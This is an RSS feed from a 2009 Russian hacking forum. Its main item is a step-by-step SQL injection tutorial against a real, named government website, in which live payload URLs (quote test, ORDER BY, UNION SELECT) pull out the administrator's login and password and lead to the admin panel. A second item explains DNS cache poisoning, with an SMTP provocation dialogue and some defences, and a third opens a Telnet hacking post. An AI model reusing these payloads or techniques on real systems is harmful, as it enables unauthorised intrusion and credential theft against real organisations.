<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://sapog.forumbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>САПОГ</title>
		<link>http://sapog.forumbb.ru/</link>
		<description>САПОГ</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 20 Nov 2009 17:16:33 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Домофон-Пути взлома +шутки!?</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=53#p53</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: maroon&quot;&gt;&lt;span style=&quot;font-size: 16px&quot;&gt;Круто!!!&lt;/span&gt;&lt;/span&gt;&amp;#160; :crazyfun:&lt;/p&gt;</description>
			<author>mybb@mybb.ru (koka)</author>
			<pubDate>Fri, 20 Nov 2009 17:16:33 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=53#p53</guid>
		</item>
		<item>
			<title>Очередная SQL injection.</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=52#p52</link>
			<description>&lt;p&gt;Привет хацкеры,кул хацкеры и новички!С вами redbu11.В этой статье пойдёт речь о такой уязвимости как &lt;/p&gt;
						&lt;p&gt;SQL injection.Я знаю что таких статей в инете немеряно,но всё-таки я напишу ещё одну статейку о &lt;/p&gt;
						&lt;p&gt;такой уязвимости.Я написал эту статью для тех у кого ещё не сформировалась идея о этой уязвимости,то &lt;/p&gt;
						&lt;p&gt;есть новичкам в этом деле.То что я буду рассказывать,совсем не новое,Так что расчитана для &lt;/p&gt;
						&lt;p&gt;новичков.Я думаю вы все знаете что такое SQL уязвимость,а если нет,то поищите в инете,там много про &lt;/p&gt;
						&lt;p&gt;это написано,просто если я щас начну объяснять что это такое в больших подробностях,то это займёт &lt;/p&gt;
						&lt;p&gt;много времени.И так приступим.))&lt;br /&gt;Для обнаружения SQL инъекции я чаще всего пользуюсь манипулированием числовыми параметрами в GET &lt;/p&gt;
						&lt;p&gt;запросах.Вот например меня как-то заинтересовала такая ссылка:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;тут id=58 и есть числовой параметр.Итак,проверим её на уязвимость.В конец ссылки добавляем одиночную &lt;/p&gt;
						&lt;p&gt;кавычку &#039;.&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58&#039;&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58&#039;&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;И смотрим на результат.Опа!Страница загрузилась неправильно и выдала нам SQL ошибку:&lt;/p&gt;
						&lt;p&gt;Open Database: Invalid query&lt;br /&gt;SELECT * FROM tbl_berita where berita_id=57&#039;&lt;/p&gt;
						&lt;p&gt;Ура!Это и есть SQL уязвимость.Но чтобы убедиться что уязвимость действительно существует,проверим &lt;/p&gt;
						&lt;p&gt;ещё кое-что.ПЕреходим опять по адресу:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;И видим там страницу с заголовком &amp;quot;KOMNAS FBPI CONTINUES BIRD FLU CONTROL PROGRAM&amp;quot;.Ок,теперь &lt;/p&gt;
						&lt;p&gt;перейдём на страничку &amp;quot;ниже&amp;quot;,не на 58-ую а на 57-ую,то есть так:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=57&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=57&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;И видим там страницу уже с другим заголовком &amp;quot;Air Batu Asahan Villagers Are Confirmed Bird Flu &lt;/p&gt;
						&lt;p&gt;Negative&amp;quot;.Теперь переходим обратно на 58-ую страницу:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Теперь когда мы знаем что 58-ая страница имеет заголовок &amp;quot;KOMNAS FBPI CONTINUES BIRD FLU CONTROL &lt;/p&gt;
						&lt;p&gt;PROGRAM&amp;quot; а 57-ая имеет заголовок &amp;quot;Air Batu Asahan Villagers Are Confirmed Bird Flu Negative&amp;quot; то &lt;/p&gt;
						&lt;p&gt;проверим переменную &amp;quot;id&amp;quot; на уязвимость и составим такой запрос:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58-1/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58-1/*&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;(Всегда закрываем символом /*)И смотрим на результат.В результате загрузилась не 58 а 57 &lt;/p&gt;
						&lt;p&gt;страница.Ура!!!Уязвимость действительно есть!А что это значит?С предыдущим запросом мы попытались &lt;/p&gt;
						&lt;p&gt;выполнить простую арифметическую операцию,то есть 58-1,и сайт её не отвильтровал а выполнил,и в &lt;/p&gt;
						&lt;p&gt;результате мы получили 58-1=57,это означает что вместо этого мы можем вставить любой другой запрос &lt;/p&gt;
						&lt;p&gt;который нам будет более полезен.Мы сейчас будем пытаться вытащить с помощью этой уязвимости из базы &lt;/p&gt;
						&lt;p&gt;данных логин и пасс админа.И так,сначало нам надо выяснить сколько полей в базе данных.Я для этого &lt;/p&gt;
						&lt;p&gt;использую оператор &amp;quot;order+by&amp;quot;.И так проверим сколько-же там полей используя order+by:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+30/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; er+by+30/*&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;На такой запрос нам выдалась ошибка,это означает что полей меньше чем 30.Пробуем так:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+20/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; er+by+20/*&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;На это нам тоже выдалась ошибка,значит полей меньше 20-и.Пробуем дальше:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+10/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; er+by+10/*&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;На это нам не выдалось никакой ошибки,это означает что полей или 10,или больше 10-и.Продалжаем в &lt;/p&gt;
						&lt;p&gt;этом-же духе пока не обнарушем верное количество полей:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+15/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; er+by+15/*&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Страница снова загрузилась с ошибкой,это означает что полей меньше чем 15,пробуем так:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+order+by+14/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; er+by+14/*&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Уряяя!Страница 14 загрузилась нормально,а 15-ая загружалась с ошибкой,это означает что полей &lt;/p&gt;
						&lt;p&gt;всего-лишь 14,это нам только наруку.Теперь зная что полей 14,посмотрим какое из них принтабельное,то &lt;/p&gt;
						&lt;p&gt;есть с помощью какого поле выводиться информация.Для этого нам нужно воспользоваться оператором &lt;/p&gt;
						&lt;p&gt;&amp;quot;union+select&amp;quot;,составляем запрос,делаеться это так:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; 12,13,14/*&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Смотрим на результат,когда страница загрузиться,прокручиваем страницу до самого низа,и мы увидим что &lt;/p&gt;
						&lt;p&gt;там отоброжаеться цифра 9,это означает что для вывода информации используеться 9-ое поле.&lt;br /&gt;Ну вот теперь когда мы знаем что в базе только 14 полей и использутся 9-ое принтабельное,переходим к &lt;/p&gt;
						&lt;p&gt;следующему этапу,будем долбить базу данных и пробовать вытащить оттуда логип и пасс Админа.))Нам щас &lt;/p&gt;
						&lt;p&gt;нужно проверить существует ли в базе данных таблици с названием типа users,user,admin И т.д...Это &lt;/p&gt;
						&lt;p&gt;тоже делаеться с оператором union+select.Нам щас нужен логин и пасс админа,давайте начнём с &lt;/p&gt;
						&lt;p&gt;логина.Для того чтоб узнать логин,нам надо проверить существует ли в базе данных таблица с названием &lt;/p&gt;
						&lt;p&gt;name,или login,где и храниться логин.Теперь мы и будем проверять на наличие всех этих таблиц.Делаем &lt;/p&gt;
						&lt;p&gt;это как я уже говорил оператором union+select таким образом:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; 3,14+from+&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;users/*&lt;/p&gt;
						&lt;p&gt;Этим мы проверяем существует ли таблица users в базе данных,если такая существует,то страница &lt;/p&gt;
						&lt;p&gt;загрузиться без ошибки,а если такой нет,то загрузиться с ошибкой.Нам на это выдалась ошибка,значет &lt;/p&gt;
						&lt;p&gt;такой нет.Проверим есть ли таблица users:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+user/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; 3,14+user/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;*&lt;/p&gt;
						&lt;p&gt;к сожалению и такой не оказалось,тоже нам на это выдалась ошибка...((Но не надо &lt;/p&gt;
						&lt;p&gt;расстраиваться!Многие админы используют префиксы перед названием таблицы.Теперь обратите внимание на &lt;/p&gt;
						&lt;p&gt;ту ошибку которая нам выводиться:&lt;/p&gt;
						&lt;p&gt;Open Database: Invalid query&lt;br /&gt;SELECT * FROM tbl_berita where berita_id=57&#039;&lt;/p&gt;
						&lt;p&gt;Посмотрите там на этот текст: tbl_berita&lt;br /&gt;Тут используеться префикс tbl_ перед названием таблицы.Давайте проверим существует ли таблица user &lt;/p&gt;
						&lt;p&gt;используя этот префикс!Ок,делаем запрос:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+tbl_u&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; 3,14+tbl_u&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;ser/*&lt;/p&gt;
						&lt;p&gt;Есть!Ура!Страница загрузилась нормально,значит таблица tbl_user существует!Теперь попробуем достать &lt;/p&gt;
						&lt;p&gt;имя пользователя из таблицы tbl_user.Проверим,существует ли запись с названием name в таблицы &lt;/p&gt;
						&lt;p&gt;tbl_user.Это делаесть почти также,только в 9-ое поле вставляем слово name,этим мы и будем проверять &lt;/p&gt;
						&lt;p&gt;существует ли запись name в таблицы tbl_user.Этот запрос будет выглядеть так:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13,14+tb&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; 2,13,14+tb&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;l_user/*&lt;/p&gt;
						&lt;p&gt;Посмотрим что мы на это получем,А нам на это страница загрузилась нормально,значит есть &lt;/p&gt;
						&lt;p&gt;такая!Прокручиваем страничку в самый низ,и видим там запись &amp;quot;Administrator&amp;quot;,Ураа!!У нас теперь есть &lt;/p&gt;
						&lt;p&gt;логин админа,осталось достать пасс.Пробуем:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; 11,12,13,1&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;4+tbl_user/*&lt;/p&gt;
						&lt;p&gt;На это нам страница загрузилась с ошибкой,это означает что нет записи password,пробум так:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,passwd,10,11,12,13,14+&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; ,12,13,14+&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;tbl_user/*&lt;/p&gt;
						&lt;p&gt;На это тоже выдалась ошибка,,такой тоже нет((пробуем дальше:&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.komnasfbpi.go.id/berita_eng.php?id=58+union+select+1,2,3,4,5,6,7,8,pwd,10,11,12,13,14+tbl&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/berita_eng. &amp;#8230; ,13,14+tbl&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;_user/*&lt;/p&gt;
						&lt;p&gt;Даа!Страница загрузилась без ошибки,и это значит что запись!!!Прокручиваем страницу в самый низ и &lt;/p&gt;
						&lt;p&gt;там мы видим пасс админа!!!Осталось его расшифровать и всё!!!&lt;br /&gt;Потом переходим сюда &lt;a href=&quot;http://www.komnasfbpi.go.id/admin&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.komnasfbpi.go.id/admin&lt;/a&gt; вводим полученные данные,и всё,дальше всё &lt;/p&gt;
						&lt;p&gt;зависит от вашей фантазии!&lt;br /&gt;Вот и всё,всё о чём бы я с вами хотел бы поделиться.Я описал просенькую SQL инъекцию.&lt;/p&gt;
						&lt;p&gt;ВНИМАНИЕ!Автор не несёт никакой ответственности за некорректное использование размещённой здесь &lt;/p&gt;
						&lt;p&gt;информации!Всё что здесь размещено,это не пробуждения к действию,а всего-лишь для ознакомительных &lt;/p&gt;
						&lt;p&gt;целей!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:43:19 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=52#p52</guid>
		</item>
		<item>
			<title>Атака на DNS</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=51#p51</link>
			<description>&lt;p&gt;1. DNS с высоты птичьего полета&lt;/p&gt;
						&lt;p&gt;Служба доменных имен представляет собой распределенную базу данных, основным содержанием которой является информация о соответствии символических имен сетевых объектов их IP-адресам. DNS организована по иерархическому принципу. Структурной единицей этой базы является домен (domain), который в свою очередь может содержать другие домены (поддомены). &lt;br /&gt;Первичным источником информации о каждом домене является ответственный за данный домен DNS-сервер (на самом деле их может быть несколько). Ответственность за часть доменной информации (поддомены) может быть делегирована другим серверам. &lt;br /&gt;Клиентская часть DNS называется резолвером (resolver), доступ к которому прикладные программы получают через API операционной системы. При взаимодействии резолвера с сервером в качестве транспортного протокола используется UDP, не предусматривающий формирования виртуального канала. Запросы, генерируемые резолвером, являются рекурсивными, т.е. в качестве ответа на такой запрос возвращается либо искомая информация, либо сообщение о ее отсутствии. &lt;br /&gt;Получив запрос от резолвера, сервер либо сразу же возвращает ответ (при условии наличия искомой информации в локальной базе), либо формирует запрос к другому серверу. Этот запрос обычно является итеративным и, в отличие от рекурсивного, допускает ответ в виде ссылки на другой сервер, который лучше осведомлен о месте расположения искомой информации. &lt;br /&gt;В общем случае поиск начинается с корневого сервера, который возвращает информацию о серверах, ответственных за домены верхнего уровня, после чего формируется новый итеративный запрос к одному из этих серверов и т.д. Результатом такой цепочки вопросов-ответов является либо получение искомой информации, либо вывод о ее отсутствии, после чего полученный ответ возвращается резолверу. Вся накопленная сервером в процессе работы информация кэшируется с целью ускорения обслуживания последующих запросов и минимизации сетевого трафика.&lt;/p&gt;
						&lt;p&gt;2. Межсегментная удаленная атака на DNS-сервер&lt;/p&gt;
						&lt;p&gt;Возможность атаки на DNS путем фальсификации ответа DNS-сервера известна довольно давно (см., например, Медведовский И.Д., Семьянов П.В., Платонов В.В. Атака через Internet. - СПб.: &amp;quot;Мир и семья-95&amp;quot;, 1997.). Объектом атаки может являться как резолвер, так и DNS-сервер. Причины успеха подобных атак кроются в легкости подделки ответа сервера. Протоколы DNS, используемые в настоящее время, не предусматривают каких либо средств проверки аутентичности полученных данных и их источника, полностью полагаясь в этом на нижележащие протоколы транспортного уровня. Используемый транспортный протокол (UDP) с целью повышения эффективности не предусматривает установления виртуального канала и использует в качестве идентификатора источника сообщения IP-адрес, который может быть элементарно подделан. &lt;br /&gt;При наличии у атакующего возможности перехвата сообщений, которыми обмениваются клиент и сервер (внутрисегментная атака) реализация атаки не представляет каких либо трудностей. Однако этот вариант не представляет и значительного практического интереса, поскольку возможность внутрисегментной атаки предполагает наличие определенного взаимного расположения клиента, сервера и хоста атакующего (например, атакующий и целевой DNS-сервер разделяют общую физическую среду передачи), что на практике реализуется довольно редко. &lt;br /&gt;Значительно более общим случаем является межсегментная атака, не требующая для своей реализации столь жестких условий. По этой причине мы остановимся на рассмотрении именно этого класса удаленных атак, представляющих как академический, так и практический интерес. &lt;br /&gt;Межсегментная атака на DNS-сервер выглядит следующим образом. Предположим для определенности, что целью атаки является &amp;quot;подмена&amp;quot; IP-адреса web-сервера wwwcoolsite.com на IP-адрес сервера wwwbadsite.com для пользователей некоторой подсети, которую обслуживает DNS-сервер ns.victim.com. В первой фазе атаки ns.victim.com провоцируется на поиск информации о IP-адресе wwwcoolsite.com путем посылки ему соответствующего рекурсивного запроса. Во второй фазе атакующий посылает серверу ns.victim.com ложный ответ от имени ns.coolsite.com, который является ответственным за домен coolsite.com. В ложном ответе вместо реального IP-адреса wwwcoolsite.com указывается IP-адрес wwwbadsite.com. Сервер ns.victim.com кэширует полученную информацию, в результате чего в течении определенного промежутка времени (величина этого промежутка указывается в поле TTL ложного ответа и может произвольно выбираться атакующим) ничего не подозревающие пользователи вместо сервера wwwcoolsite.com попадают на wwwbadsite.com. &lt;br /&gt;Для того, чтобы ложный ответ был воспринят сервером ns.victim.com как истинный, достаточно выполнения четырех условий: &lt;/p&gt;
						&lt;p&gt;• IP адрес отправителя ответа должен соответствовать IP-адресу запрашиваемого сервера (в нашем случае ns.coolsite.com); &lt;br /&gt;• UDP-порт, на который направляется ответ, должен совпадать с портом, с которого был послан запрос; &lt;br /&gt;• идентификатор ответа должен совпадать с идентификатором запроса; &lt;br /&gt;• ответ должен содержать запрашиваемую информацию (в нашем случае IP-адрес web-сервера wwwcoolsite.com). &lt;/p&gt;
						&lt;p&gt;Очевидно, что выполнение первого и четвертого условий не представляет для атакующего особых трудностей. Со вторым и третьим условиями ситуация намного сложнее, поскольку в случае межсегментной атаки у атакующего нет возможности перехватить исходный запрос и &amp;quot;подсмотреть&amp;quot; необходимые параметры. &lt;br /&gt;Большинство используемых в настоящее время реализаций DNS-сервера (BIND4, MS DNS) используют для исходящих запросов 53 порт, так что можно &amp;quot;на удачу&amp;quot; послать ложный ответ на этот порт. Однако данный метод будет срабатывать не всегда, поскольку, например, BIND8 может использовать для исходящих запросов любой случайно выбранный непривилегированный порт. &lt;br /&gt;Идентификатор (id) запроса представляет собой двухбайтовое число, указываемое сервером в запросе с целью однозначной идентификации ответа на данный запрос. Это число инкрементируется с каждым новым запросом. Незнание текущего значения идентификатора приводит к необходимости посылки множества ложных ответов с различными значениями id. &lt;br /&gt;Именно это обстоятельство делает практическую реализацию данной атаки очень трудноосуществимой. Действительно, ложный ответ должен быть получен целевым сервером в промежуток времени с момента посылки запроса и до момента прихода ответа от настоящего сервера, что на практике составляет не более нескольких секунд. За этот интервал времени атакующему необходимо послать 216 ложных ответов со всеми возможными значениями id, а в случае незнания порта эта цифра увеличивается еще в несколько десятков раз. Поскольку размер IP-пакета, содержащего ложный ответ, составляет около 100 байт, то перед атакующим ставится задача пересылки нескольких мегабайт информации за несколько секунд, что в подавляющем большинстве случаев неосуществимо. &lt;/p&gt;
						&lt;p&gt;3. Метод определения номера порта и текущего идентификатора запроса&lt;/p&gt;
						&lt;p&gt;При выполнении дополнительного условия даже в случае межсегментной атаки у атакующего есть возможность определения текущего id запроса и номера порта. Таким условием является наличие контролируемого атакующим DNS-сервера, ответственного за любой домен. Контроль над сервером в данном контексте означает возможность перехвата всех запросов, адресованных данному серверу. Это возможно либо если атакующий непосредственно владеет сервером (является его администратором), либо разделяет с ним общую физическую среду передачи (в случае ethernet это означает нахождение в одном коллизионном домене). Очевидно, что данное условие не является слишком жестким, поскольку нахождение в одном коллизионном домене с DNS-сервером достаточно типично для многих пользователей корпоративных сетей. &lt;br /&gt;При наличии контролируемого сервера описанная атака может быть модифицирована следующим образом. Предположим для определенности, что атакующий контролирует сервер ns.hacker.com, ответственный за домен hacker.com. В первой фазе атаки мы провоцируем сервер ns.victim.com на обращение к ns.hacker.com путем посылки рекурсивного запроса на поиск информации о любом имени (не обязательно реальном) в домене hacker.com. Поскольку ns.hacker.com находится под контролем атакующего, он может перехватить этот запрос и извлечь из него информацию о номере порта и текущем id. &lt;br /&gt;Последующие две фазы атаки не отличаются от описанных, с той лишь разницей, что теперь атакующему достаточно послать всего несколько ложных ответов, поскольку он точно знает номер порта и может с высокой степенью точности предсказать значение идентификатора запроса к ns.coolsite.com. &lt;/p&gt;
						&lt;p&gt;4. Метод косвенной провокации&lt;/p&gt;
						&lt;p&gt;Очевидно, что необходимым условием успешности описанной атаки является возможность посылки рекурсивных запросов целевому серверу, провоцирующих его на обращение к другим серверам с целью поиска запрашиваемой информации. В принципе, существует возможность настроить DNS-сервер таким образом, что он будет принимать рекурсивные запросы только от &amp;quot;своих&amp;quot; клиентов (хостов, резолверы которых настроены на использование данного сервера). В этом случае осуществление атаки становится невозможным. &lt;br /&gt;С целью обхода этого ограничения можно предложить простой метод, который условно назовем &amp;quot;косвенной провокацией&amp;quot;. Основная идея этого метода заключается в использовании любого общедоступного сервиса, являющегося клиентом целевого DNS-сервера, для формирования необходимого провоцирующего запроса. Наиболее подходящим кандидатом представляется общедоступный сервер электронной почты, который по определению должен принимать соединения с любого компьютера Internet. Предположим, что резолвер компьютера mail.victim.com настроен на использование сервера ns.victim.com, причем последний принимает рекурсивные запросы только от домена victim.com. Приведенный ниже SMTP-диалог провоцирует ns.victim.com на поиск информации о имени any-name.any-domain.com: &lt;br /&gt;$ telnet mail.victim.com 25&lt;br /&gt;Trying...&lt;br /&gt;Connected to mail.victim.com.&lt;br /&gt;Escape character is &#039;^]&#039;.&lt;br /&gt;220 mail.victim.com ESMTP Sendmail 8.8.0/8.8.0; Wed, 5 May 1999 21:30:42&lt;br /&gt;helo I.am.cracker&lt;br /&gt;250 mail.victim.com Hello crack.hacker.com [1.1.1.1], pleased to meet you&lt;br /&gt;mail from: user@any-name.any-domain.com&lt;br /&gt;250 user@any-name.any-domain.com... Sender ok&lt;br /&gt;quit&lt;br /&gt;221 mail.victim.com closing connection&lt;br /&gt;Connection closed.&lt;/p&gt;
						&lt;p&gt;Таким образом, применение метода &amp;quot;косвенной провокации&amp;quot; позволяет осуществить атаку без прямой посылки запросов целевому DNS-серверу.&lt;/p&gt;
						&lt;p&gt;5. Как возникают эпидемии&lt;/p&gt;
						&lt;p&gt;В обычных условия успешная атака приводит к &amp;quot;заражению&amp;quot; кэша конкретного сервера и область распространения ложной информации ограничивается только его клиентами. Однако при наличии ситуации &amp;quot;некорректного делегирования&amp;quot; (lame delegation), возникающей из-за ошибок администрирования, возможно распространение ложной информации на другие сервера, что приведет к глобальному &amp;quot;заражению&amp;quot;. &lt;br /&gt;Под некорректным делегированием понимается ситуация, когда ответственность за домен делегируется серверу, не обладающему локальной копией доменной информации. Это приводит к тому, что в ответ на итеративные запросы других серверов вместо искомой информации он возвращает ссылки на другие сервера (иногда и на себя), которые, с точки зрения данного сервера, располагают нужными сведениями. &lt;br /&gt;Рассмотрим ситуацию, когда для домена victim.com существуют два ответственных сервера - ns.victim.com и ns2.victim.com, причем для ns2.victim.com делегирование выполнено некорректно. Применяя описанные методы, атакующий может &amp;quot;заразить&amp;quot; кэш сервера ns2.victim.com ложной информацией о именах в домене victim.com, например, подменить IP-адрес web-сервера wwwvictim.com на IP-адрес wwwvery-bad-site.com. Поскольку ns2.victim.com считается ответственным за домен victim.com, другие сервера в Internet будут обращаться к нему за информацией о именах в этом домене. Не располагая локальной копией доменной информации о victim.com, данный сервер будет возвращать в ответ ранее кэшированную ложную информацию, приводя к &amp;quot;заражению&amp;quot; всех обратившихся к нему серверов. &lt;br /&gt;Неприятной особенностью данного сценария является невозможность быстрой ликвидации последствий атаки, поскольку ложная информация будет находиться в кэшах тысяч серверов до истечения времени жизни, которое атакующий может выбрать очень большим. &lt;/p&gt;
						&lt;p&gt;6. Реализация и полевые испытания&lt;/p&gt;
						&lt;p&gt;Программа, реализующая атаку на DNS-сервер с использованием контролируемого сервера, стала доступна в Internet примерно в феврале 1999 года. К счастью, использование этой программы не сводится к вводу в окошко IP-адреса целевого сервера и нажатию кнопки &amp;quot;Infect It!&amp;quot;, а требует достаточно глубокого понимания принципов работы DNS, что сразу же отсеивает 99% потенциальных пользователей. Кроме того, в известной автору реализации сделано далеко не все для повышения вероятности успеха атаки. &lt;br /&gt;С целью обеспечения чистоты эксперимента &amp;quot;полевые испытания&amp;quot; были проведены на трех неподконтрольных автору корпоративных сетях. Естественно, администраторы этих сетей были поставлены в известность и не возражали против проведения эксперимента. Как это ни печально, во всех трех случаях атака была успешной. &lt;br /&gt;Диапазон целей, которые могут быть достигнуты при помощи атаки на DNS, простирается от &amp;quot;отказа в обслуживании&amp;quot; и подмены web-сайтов до перехвата сообщений электронной почты и полного контроля над информацией, передаваемой между произвольно выбранными хостами Internet. При всем этом атакующий практически не оставляет следов, поскольку ему нет необходимости посылать провоцирующие запросы и ложные ответы с собственного IP-адреса. &lt;/p&gt;
						&lt;p&gt;7. Взгляд с другой стороны баррикады&lt;/p&gt;
						&lt;p&gt;По мнению автора, в настоящее время единственным надежным средством противодействия описанной атаке является использование стандартизированных в RFC2065 расширенных протоколов DNS, предусматривающих применение криптографических методов аутентификации доменной информации и субъектов сетевого взаимодействия. Базовая поддержка этого стандарта уже включена в текущую версию BIND8. &lt;br /&gt;К сожалению, желаемый результат может дать только широкомасштабное внедрение новых протоколов, которое сопряжено со значительными организационными трудностями и не может быть проведено за короткое время. &lt;br /&gt;Несколько затруднить осуществление атаки может запрет на обслуживание DNS-сервером рекурсивных запросов, поступающих не от &amp;quot;своих&amp;quot; клиентов. Это может быть сделано как средствами самого сервера (например, BIND8 обладает такими возможностями), так и средствами межсетевого экрана. Следует обратить внимание на настройку &amp;quot;антиспуффинговых&amp;quot; правил фильтрации на межсетевом экране, поскольку атакующий в качестве IP-адреса отправителя запроса может указать любой адрес, в том числе и легального клиента. &lt;br /&gt;При использовании данного метода не следует забывать, что подобная защита может быть достаточно легко преодолена использованием описанного метода косвенной провокации.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:42:24 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=51#p51</guid>
		</item>
		<item>
			<title>Усовершенственный взлом через Telnet</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=50#p50</link>
			<description>&lt;p&gt;Я полный новичок, так что прошу сильно не пинать ! Я знаю что про Telnet написано выше крыши, но йя хотел бы показать слегка доведенный до ума скрипт.&lt;/p&gt;
